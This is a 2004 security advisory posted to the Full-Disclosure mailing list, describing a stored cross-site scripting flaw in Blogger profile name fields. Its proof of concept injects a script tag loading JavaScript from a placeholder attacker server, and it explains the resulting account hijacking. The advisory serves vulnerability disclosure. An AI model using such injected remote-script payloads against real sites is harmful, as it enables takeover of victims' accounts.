[Full-Disclosure] Blogger XSS Vulnerability


-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------ BLOGGER XSS VULNERABILITY - ------------------------------------------------------ Online URL : http://ferruh.mavituna.com/article/?470 Severity : Moderately Critical for Members (Permanent Account Hijacking) - ------------------------------------------------------ ABOUT BLOGGER; - ------------------------------------------------------ Blogger is a web-based tool that helps you publish to the web instantly -- whenever the urge strikes. Blogger is the leading tool in the rapidly growing area of web publishing known as weblogs, or "blogs." by Google (Pyra Labs acquired by Google) - ------------------------------------------------------ XSS DETAILS; - ------------------------------------------------------ There is no HTML filter when rendering user profiles. So anyone can inject a script into a profile's "First Name" "Last Name" etc. If you inject a code into "First Name" this will be print and run in users's first page [www.blogger.com], so an attacker can easily gain victim's account. ------------------------------------------------------ Proof Of Concept; ------------------------------------------------------ Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to victim "First Name" Now you can execute anything in remote. After login as your victim; I. You can change password (without old password) II. You can change e-mail address without any confirmation III. You can own the victim blogs *Replace ][,<> *Script injection is limited to 50 characters (but it's pretty enough to add js script) - ----------------------------------------------------- HISTORY; - ------------------------------------------------------ Discovered : 2/22/2004 Vendor Informed : 2/25/2004 Published : 3/26/2004 - ------------------------------------------------------ VENDOR STATUS; - ------------------------------------------------------ Contact established with Google but there is no answer. Ferruh Mavituna Web Application Security Specialist http://ferruh.mavituna.com ferruh@mavituna.com PGPKey : http://ferruh.mavituna.com/PGPKey.asc -----BEGIN PGP SIGNATURE----- Version: PGP 8.0.3 iQA/AwUBQGRJDzL0QoVzo2STEQJmRwCgxUQ+ZG5yfajXvitVnJDhB9e5lY4AoNGB ANN10x5LT+9GahY9KvS9PURv =YmrO -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html